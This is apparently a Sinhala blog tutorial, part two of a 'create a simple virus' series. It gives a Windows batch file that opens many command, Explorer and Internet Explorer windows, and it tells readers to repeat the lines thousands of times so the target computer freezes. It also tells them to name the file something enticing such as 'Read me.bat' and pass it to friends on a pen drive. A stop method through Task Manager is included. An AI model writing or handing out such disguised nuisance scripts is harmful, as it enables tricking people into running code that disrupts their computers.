සරල පරිගනක වයිරසයක් නිර්මාණය 2- (පිස්සු කෙලීම)
කට්ටියට කොහොමද?ඔන්න පැය 24කට විතර පස්සේ මං ඉක්මනටම හම්බෙලා යන්න ආවා.ඊයෙ මං ගෙනාවා මතක ඇතිනේ සරල වයිරසයක් නිර්මාණය කිරීම 1 කියලා එකක්.ඔන්න මං ඉක්මනටම ඒකෙ 2 කොටස ඒ කියන්නේ සරල වයිරසයක් නිර්මාණය 2 කොටස.අදත් ඉතින් ඊයෙ පෝස්ට් එක වගේ ටිකක් වෙනස් එකක් ගෙනාවා.ඊයෙ පෝස්ට් එක බැලුවේ නැත්තම් මෙතනින් යන්න.අද මං ගෙනාපු වයිරස් එකක් වගේ එකෙන් පුලුවන් Computer එක ටිකක් පිස්සු නටවන්න.හොදයි නේද?ඊයෙත් Try කරලා බැලුවනම් CD ට්රේ එක පිස්සු නටන හැටි දකින්න ඇති.අපි මේක ගැනත් පල්ලේ ජේදෙන් හොයලා බලමුකෝ…
මේකත් ඉතින් ඇත්තටම කියනවා නම් පොඩි එකක්.මේකත් චුට්ටි බට්ටෙක්ටත් හදන්න පුලුවන්.අපි වැඩ පටන් ගමු නේද?ඊයෙ කිව්වා වගේම මේකටත් අපට එපා වෙලා තිබුන ඒත් දැන් ටික ටික වටිනාකමක් වැඩි වෙන Notepad එක ඕන වෙනවා.මේ වැඩේ ලේසි වෙනවා මේක හදන්න කලින් අනිත් Post එකත් කියවලා තිබුනානම්.ඒක කියවලා මේකත් කරන්න.ඔන්න මං කෝඩ් ටික දෙනවා ටයිප් කරලා හරි කොපියක් හරි දාගෙන ඉන්න මේ කෝඩ් ටික නෝට්පෑඩ් එකට.
@echo off
:A
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer
ඔන්න ඕකයි බ්රෝස් කෝඩ් එක.දැන් ඔයාලාට තියෙන්නේ කැමති නමක් දාලා නම අන්තිමට .bat (balla.bat , Read me.bat , bole.bat ) කියලා කැමති තැනක සේව් කරගන්න තමයි.ඔයාලාට ඔය කෝඩ් එක ගැන බලාගෙන ඉදලා හිතලා බැලුවොත් තේරේවි ඕක එක විදිහකට යන කෝඩ් එකක් කියලා.ම් ම් ඔව්.ඒ කතාව ඇත්ත.ඕකේ එක විදිහකට තමයි කෝඩ් එක යන්නේ.ඕකෙ තියෙන කෝඩ් එක තියෙන්නේ දෙපාරයි.ඕක අපට ඕනේ නම් 10,100,1000,10000 නැත්තම් 100000ක් උනත් දාගන්න පුලුවන්.එතකොට ඒ කෝඩ් එක තියෙන ගාන අනුව එක Open වේවි.ඒ වගේම එහෙම වැඩි උනොත් Computer එක Stuckවෙයි.අපි Window එක Ok හරි Close හරි දුන්නා කියන්නේ බඩේ බඩු.මේක ඔයාගේ Computer එකේ Test කරලා බලන්න පුලුවන් ඒකත් ප්රශ්නයක් නෑ.හැබැයි මතක තියාගන්න මං දීලා තියෙන රටාව 2යි.ඒ ගාන හොදටෝම ඇති.වැඩි උනොත් කේස්.ඒකෙන් අව්ල් වෙන්නේ ඔයාලගෙම PC එකටම තමයි.ඔයා ඔය රටාවෙදිම ඒ කියන්නේ 2දි Open කරගන්න .අව්ලක් නෑ එතකොට.ඔය තියෙන වාර ගාන වැඩි කරලා දෙන කෙනෙක්ට දෙන්න.
අම්මට සිරි.දැන් ඉතිං අපි ඕක ට්රයි කලාට නවත්තන්න දන්නේ නැත්තම් බඩු පැකට් නේද?ඒක හින්දා මේක නවත්තන ක්රමේ දැනගන්න.මෙන්න මෙහෙමයි ,මුලින්ම Task Manager එකට යන්න.(search පාරක් දාලා හරි Ctrl එක්ක Alt ඔබාගෙනම Delete බටන් කෑල්ල ඔබලා එන එකෙන් Task Manager එක තෝරගන්න.)එතකොට ඔයාලාට පල්ලේ පොටෝ එකේ විදිහට පෙනෙයි.
(මෙම පින්තූරය පිලිබද අප කනගාටුවට පත් වෙමු.සිදු වූ අපහසුතාවට සමාවන්න.එම පිංතූරය Comment Box හී ඉදිරියේදී ඇතුල් කරනු ඇත.)
Windows Command Processor 2ක් 3ක් පෙනෙයි.ඔයාලාට තියෙන්නේ End task කරගන්න ඒ සේරම.නැත්තම් Restart කරන්න එතකොට මෙලෝම අව්ලක් නෑ.කතාව ඉවරයි.
මේක බෙදා හරින ක්රම මට වඩා හොදට ඉතිං ඔයාලා දන්නවනේ.ඔය පෙන් එකකට චිප් එකකට දාලා දෙන්න..මතක් කරලා Open කරන්න හිතෙන නමක් දාලා දෙන්න.එතකොට උබ පොර…උබ පොර උනාට කමක් නෑ.හැබැයි ගුටි කෑමට අපි නැතෝ.කන කෑමක් තනියම කන්න.මට එපා.දැන් ඉතින් වැඩ ඉවරයි.Comment, Share දාලා යාලුවන්ටත් පෙන්නන්න.


https://pariganakalokaya10.blogspot.com/2016/09/1-cd-rom.html
ReplyDelete